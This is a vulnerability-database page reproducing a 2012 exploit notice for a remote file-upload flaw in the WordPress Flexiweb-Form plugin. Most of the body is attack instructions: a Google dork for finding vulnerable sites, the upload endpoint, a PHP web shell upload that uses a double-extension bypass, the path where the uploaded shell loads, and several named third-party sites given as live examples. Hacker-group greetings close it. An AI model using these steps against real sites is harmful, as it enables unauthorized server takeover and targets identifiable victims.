Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Flexiweb-Form Shell Upload

🗓️ 04 Jul 2012 00:00:00Reported by Mr.XpRType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

WordPress Flexiweb-Form plugin Remote File Uploader by Mr.XpR, high-level bug identifie

Code
`##################################################################  
  
0101010101----010101010101010  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101 0101  
01 01------0101010101  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
01 01------0101 010  
0101010101----0101 010  
  
##################################################################  
  
[+] Exploit Title : Word press flexiweb-form plugin Remote File Uploader  
  
[+] Google Dork : inurl:plugins/flexiweb-form/  
  
[+] Autor : Mr.XpR   
  
[+] Download : http://www.flexiweb.com.au  
  
[+] Researcher Team : IRaNHaCK Security Team  
  
[+] Bug Level : High (RFU)  
  
[+] Test : 7 , Linux Back Track  
  
##################################################################  
  
  
[+]Exploit  
  
[-] http://Site.il/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
  
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
  
[+]Sh3ll  
  
[-] Upload Shell PhP ==> Shell.PhP or Shell.PhP;.jpg  
  
[+]Load Shell  
  
[-] http://www.Site.il/patch/wp-content/plugins/flexiweb-form/images/Shell.php  
  
[+]Example :  
  
[-] http://michelle1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://augustop.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] http://augustoperella1.memorialpage.com/wp-content/plugins/flexiweb-form/ajax/upload_img.php  
[-] More In Google ...  
  
  
Persian Gulf For Ever - Tnx To all Persian Hackerz  
  
Bax:  
  
Siamak Black - UnknowN - farbod ezrael - hell boy - all iranian hackerz   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Jul 2012 00:00Current
wordpressflexiweb-formremote file uploadermr.xpriranhack security teamhigh bug levellinux back trackshell uploadsecurityexploit
40